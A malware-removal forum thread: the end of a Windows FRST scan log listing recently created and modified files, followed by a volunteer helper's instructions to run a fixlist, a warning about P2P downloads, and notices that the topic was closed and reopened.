2014-10-17 08:53 - 2014-10-17 08:53 - 00000000 ____D () C:\Users\Ashley\aaaebookszip
2014-10-15 09:39 - 2014-10-15 10:01 - 00000000 ____D () C:\Users\Study\Desktop\Oct2014Pix
2014-10-15 09:26 - 2014-10-15 09:38 - 00000000 ____D () C:\Users\Study\Desktop\October2014Vids
2014-10-14 08:42 - 2014-10-14 08:42 - 00000000 ____D () C:\Users\Study\AppData\Roaming\WinRAR
2014-10-14 08:40 - 2014-10-14 08:51 - 00000000 ____D () C:\Users\Study\Desktop\Outlook 2013 Screenshots
2014-10-14 08:34 - 2014-10-17 16:05 - 00000680 _____ () C:\Users\Study\AppData\Local\d3d9caps.dat
2014-10-13 15:24 - 2014-10-13 15:24 - 07050784 _____ () C:\Users\Study\Downloads\Guide to Computer User Support for Help Desk and Support Specialists, A - Beisse.epub
2014-10-13 14:53 - 2014-10-13 14:53 - 00000000 ____D () C:\Users\Study\AppData\Local\Adobe
2014-10-13 14:38 - 2014-10-17 17:25 - 00000000 ____D () C:\Users\Study\AppData\Roaming\deluge
2014-10-13 14:19 - 2014-10-13 14:19 - 00000780 _____ () C:\Users\Public\Desktop\Deluge.lnk
2014-10-13 11:58 - 2014-10-13 11:58 - 00001987 _____ () C:\Users\Study\Desktop\Google Chrome.lnk
2014-10-13 11:52 - 2014-10-13 15:35 - 00000000 ____D () C:\Users\Study\AppData\Roaming\Adobe
2014-10-13 11:52 - 2014-10-13 11:52 - 00000000 ____D () C:\Users\Study\AppData\Local\Stardock_Corporation
2014-10-13 11:51 - 2014-10-13 11:51 - 00244368 _____ () C:\Users\Study\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-13 11:51 - 2014-10-13 11:51 - 00000000 ____D () C:\Users\Study\AppData\Roaming\Dell
2014-10-13 11:49 - 2014-10-17 16:21 - 00000000 ____D () C:\Users\Study
2014-10-13 11:49 - 2014-10-13 11:57 - 00000000 ____D () C:\Users\Study\AppData\Local\Google
2014-10-13 11:49 - 2014-10-13 11:49 - 00000951 _____ () C:\Users\Study\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2014-10-13 11:49 - 2014-10-13 11:49 - 00000941 _____ () C:\Users\Study\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-10-13 11:49 - 2014-10-13 11:49 - 00000936 _____ () C:\Users\Study\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2014-10-13 11:49 - 2014-10-13 11:49 - 00000917 _____ () C:\Users\Study\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows Mail.lnk
2014-10-13 11:49 - 2014-10-13 11:49 - 00000020 ___SH () C:\Users\Study\ntuser.ini
2014-10-13 11:49 - 2014-10-13 11:49 - 00000000 ____D () C:\Users\Study\AppData\Roaming\Apple Computer
2014-10-13 11:49 - 2014-10-13 11:49 - 00000000 ____D () C:\Users\Study\AppData\Local\MediaDirect
2014-10-13 11:49 - 2014-03-16 11:06 - 00000000 ____D () C:\Users\Study\AppData\Roaming\IObit
2014-10-13 11:49 - 2011-07-23 17:03 - 00000000 ____D () C:\Users\Study\AppData\Roaming\Macromedia
2014-10-13 11:49 - 2009-10-13 04:15 - 00000000 ____D () C:\Users\Study\AppData\Local\Microsoft Help
2014-10-13 11:49 - 2008-01-20 20:20 - 00000000 ___RD () C:\Users\Study\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-10-13 11:49 - 2008-01-20 20:20 - 00000000 ___RD () C:\Users\Study\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-10 13:31 - 2014-10-10 13:31 - 00003098 _____ () C:\Windows\System32\Tasks\{0E00E117-897C-40D1-869B-22B9CCA0F27C}
2014-10-10 10:22 - 2014-10-10 10:23 - 31766208 _____ (Microsoft Corporation) C:\Users\Ashley\Downloads\Windows-KB890830-x64-V5.16.exe
2014-10-10 09:51 - 2014-10-19 15:27 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-10 09:51 - 2014-10-10 09:51 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\48230029.sys
2014-10-10 09:43 - 2014-10-10 09:43 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-10 09:42 - 2014-10-10 09:43 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-10 09:42 - 2014-05-12 07:26 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-09 15:42 - 2014-10-10 12:14 - 00000000 ____D () C:\Users\Ashley\AppData\Roaming\Zahyqe
2014-10-09 15:42 - 2014-10-10 12:14 - 00000000 ____D () C:\Users\Ashley\AppData\Roaming\Uxbuxy
2014-10-09 15:41 - 2014-10-09 15:41 - 00081408 _____ () C:\Windows\system32\mpcete.dll
2014-10-09 15:41 - 2014-10-09 15:41 - 00003858 _____ () C:\Windows\System32\Tasks\{B5CED0A0-FE3D-C163-11B3-D01C230EF0A0}
2014-10-09 15:41 - 2014-10-09 15:41 - 00000000 _____ () C:\Windows\system32\rfbju.dll
2014-10-09 13:20 - 2014-10-09 13:20 - 00064443 _____ () C:\Users\Ashley\Downloads\docs.zip
2014-10-08 09:05 - 2014-10-08 09:05 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Deluge
2014-10-08 09:05 - 2014-10-08 09:05 - 00000000 ____D () C:\Program Files (x86)\Deluge
2014-10-08 09:04 - 2014-10-08 09:04 - 13590162 _____ () C:\Users\Ashley\Downloads\deluge-1.3.9-win32-setup.exe
2014-10-08 09:02 - 2014-10-08 09:02 - 00003038 _____ () C:\Windows\System32\Tasks\{592F96FF-345C-4DC9-A076-6BD9C5A145DA}
2014-09-30 14:18 - 2014-10-10 12:14 - 00000000 ____D () C:\Users\Ashley\AppData\Roaming\Xepoxyo
2014-09-30 10:03 - 2014-09-30 10:14 - 00001090 _____ () C:\Users\Guest\Desktop\ScottsdaleInsPhoneInterviewNotes.txt
2014-09-26 18:14 - 2014-09-26 18:14 - 00001489 _____ () C:\Users\Guest\Desktop\gtz.txt
2014-09-24 10:54 - 2014-09-24 17:28 - 00004003 _____ () C:\Users\Guest\Desktop\depr.txt
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-19 16:56 - 2012-09-29 15:45 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-19 16:51 - 2009-10-18 15:53 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-19 16:26 - 2012-09-29 15:56 - 00000940 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2293499177-2261026601-659138957-500UA.job
2014-10-19 15:26 - 2013-10-16 15:07 - 00000000 ____D () C:\Users\Ashley\AppData\Local\Deployment
2014-10-19 15:26 - 2008-12-22 12:22 - 00000000 ____D () C:\ProgramData\TEMP
2014-10-19 15:25 - 2009-10-18 15:53 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-19 15:25 - 2006-11-02 08:42 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-19 15:25 - 2006-11-02 08:22 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-19 15:25 - 2006-11-02 08:22 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-19 15:24 - 2014-02-16 17:49 - 00000000 ____D () C:\AdwCleaner
2014-10-19 15:24 - 2006-11-02 08:42 - 00032554 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-10-19 15:11 - 2014-01-05 20:42 - 00000000 ____D () C:\Users\Ashley\Desktop\wirelesskeyview-x64
2014-10-19 15:09 - 2014-01-02 15:19 - 00000000 ____D () C:\Users\Ashley\Desktop\Desktop Folders
2014-10-18 13:14 - 2009-09-29 18:02 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-18 12:26 - 2012-09-29 15:56 - 00000888 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2293499177-2261026601-659138957-500Core.job
2014-10-17 21:46 - 2009-10-18 15:53 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-17 21:46 - 2009-10-18 15:53 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-17 14:26 - 2009-06-01 22:38 - 00000000 ____D () C:\Program Files (x86)\FLAC
2014-10-17 11:37 - 2008-12-23 14:57 - 00006080 _____ () C:\Users\Ashley\AppData\Local\d3d9caps.dat
2014-10-17 11:37 - 2008-12-22 17:50 - 00000000 ____D () C:\Users\RA Media Server
2014-10-17 11:10 - 2008-12-22 19:44 - 00000000 ____D () C:\Users\Ashley\AppData\Roaming\uTorrent
2014-10-17 10:48 - 2006-11-02 06:33 - 00000000 __RSD () C:\Windows\Media
2014-10-17 10:10 - 2008-12-25 17:52 - 00000000 ____D () C:\Windows\Minidump
2014-10-17 09:57 - 2013-07-18 18:11 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-17 09:10 - 2006-11-02 05:35 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2014-10-17 08:53 - 2008-12-22 12:21 - 00000000 ____D () C:\Users\Ashley
2014-10-14 11:41 - 2009-05-12 15:42 - 00000000 ____D () C:\ProgramData\Lx_cats
2014-10-14 09:49 - 2010-08-07 21:50 - 00006080 _____ () C:\Users\Guest\AppData\Local\d3d9caps.dat
2014-10-10 14:07 - 2012-04-26 14:19 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-10-10 13:29 - 2013-11-27 23:16 - 00000000 ____D () C:\ProgramData\Origin
2014-10-10 13:29 - 2008-12-26 16:54 - 00000000 ____D () C:\ProgramData\Electronic Arts
2014-10-10 13:11 - 2009-11-24 21:51 - 00000000 ____D () C:\Users\Ashley\AppData\Roaming\Notepad++
2014-10-10 12:47 - 2014-07-01 16:25 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-10-10 12:14 - 2006-11-02 06:33 - 00000000 ____D () C:\Windows\security
2014-10-10 11:23 - 2014-03-27 07:02 - 00000000 ____D () C:\Users\Ashley\Desktop\secprogs
2014-10-10 11:23 - 2014-03-27 07:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Paterva
2014-10-10 09:43 - 2009-04-06 21:09 - 00000000 ____D () C:\Users\Ashley\AppData\Roaming\Malwarebytes
2014-10-10 09:42 - 2011-07-13 15:01 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-10-10 09:42 - 2009-04-06 21:09 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-09 12:26 - 2010-07-04 19:51 - 00000000 ____D () C:\Users\Guest\AppData\Roaming\Mozilla
2014-10-01 09:51 - 2014-03-15 11:59 - 00000000 ____D () C:\Users\Guest\Desktop\Old Firefox Data
2014-09-26 10:09 - 2010-07-04 19:48 - 00000000 ____D () C:\Users\Guest
2014-09-23 15:56 - 2012-09-29 15:45 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-09-23 15:56 - 2012-09-29 15:45 - 00003684 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-09-23 15:56 - 2011-05-14 05:53 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
 
Files to move or delete:
====================
C:\Users\Ashley\1535_A06.EXE
C:\Users\Ashley\jagex_runescape_preferences.dat
C:\Users\Ashley\R182272_DellVideoChat_Setup_support.exe
C:\Users\Ashley\R186378.exe
C:\Users\Ashley\R197267.exe
 
 
Some content of TEMP:
====================
C:\Users\Administrator\AppData\Local\Temp\gtalkwmp1.dll
C:\Users\Ashley\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Ashley\AppData\Local\Temp\Quarantine.exe
C:\Users\Ashley\AppData\Local\Temp\sqlite3.dll
C:\Users\Games\AppData\Local\Temp\AutoRun.exe
C:\Users\Games\AppData\Local\Temp\AutoRunGUI.dll
C:\Users\Games\AppData\Local\Temp\uttAC59.tmp.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-10-19 15:37
 
==================== End Of Log ============================


#4 Machiavelli

Machiavelli

    Agent 007


  • Malware Response Instructor
  • 3,976 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:02:53 PM

Posted 20 October 2014 - 12:01 AM

2014-10-17 08:53 - 2014-10-17 08:53 - 00000000 ____D () C:\Users\Ashley\aaaebookszip

Do you know this folder?

 

IMPORTANT I see, you have one or more P2P (Peer to Peer) programs installed.

1.) You have following P2P program installed: uTorrent
2.) If you download files from non-documented sources per a P2P File sharing Program, you can expect a infection of malware. That isn't good for your PC. A long time ago File-sharing with P2P programs like UTorrent was fairly safe. But at this time it isn't true any more. Of course you can use P2P programs at your own risk, but that is maybe your source of your infection. It would be nice if you read this here. So after reading the text you will recognize why you shouldn't have them.
3.) Please read this reports about the danger of P2P Programs:4.) I would recommend that you uninstall the above. That would be nice. If you like to uninstall the P2P Program, you can do it via Start >> Control Panel >> Add or Remove Programs
5.) If you want to keep the program on your computer , don't use it while we are fixing your computer!

 

First,
  • Please download the attached fixlist.txt file and save it to the same location as FRST
Note: It's important that both files, FRST.exe/FRST64.exe and fixlist.txt are in the same location or the fix will not work
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
  • Run FRST.exe/FRST64.exe and press the Fix button just once and wait
  • If for some reason the tool needs a restart, please make sure you let the system restart normally, then let the tool complete its run
  • When finished, FRST will generate a log (Fixlog.txt) in the same location the tool was run, please post it to your reply
Then,
  • Run FRST. (if you have Windows Vista / Windows 7 / Windows 8: Please do a Right click on the FRST icon and select Run as Administrator)
  • Click Scan to start FRST.
  • When FRST finishes scanning, a log, FRST.txt, will open.
  • Copy (Ctrl+C) and Paste (Ctrl+V) the contents of this log into your next post please.

Attached Files


~Machiavelli

If I don't reply within 24 hours please PM me!

  • Every topic with no replies within 5 days will be closed.
  • If you like my help here please give me feedback.

unite_blue.png
 
 


#5 Machiavelli

Machiavelli

    Agent 007


  • Malware Response Instructor
  • 3,976 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:02:53 PM

Posted 24 October 2014 - 12:45 PM

Due to the lack of feedback, this topic is now closed.

In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.

~Machiavelli

If I don't reply within 24 hours please PM me!

  • Every topic with no replies within 5 days will be closed.
  • If you like my help here please give me feedback.

unite_blue.png
 
 


#6 Machiavelli

Machiavelli

    Agent 007


  • Malware Response Instructor
  • 3,976 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:02:53 PM

Posted 27 October 2014 - 04:32 AM

User returned.

~Machiavelli

If I don't reply within 24 hours please PM me!

  • Every topic with no replies within 5 days will be closed.
  • If you like my help here please give me feedback.

unite_blue.png
 
 


#7 Machiavelli

Machiavelli

    Agent 007


  • Malware Response Instructor
  • 3,976 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:02:53 PM

Posted 31 October 2014 - 04:36 AM

Due to the lack of feedback, this topic is now closed.

In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.

~Machiavelli

If I don't reply within 24 hours please PM me!

  • Every topic with no replies within 5 days will be closed.
  • If you like my help here please give me feedback.

unite_blue.png
 
 





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users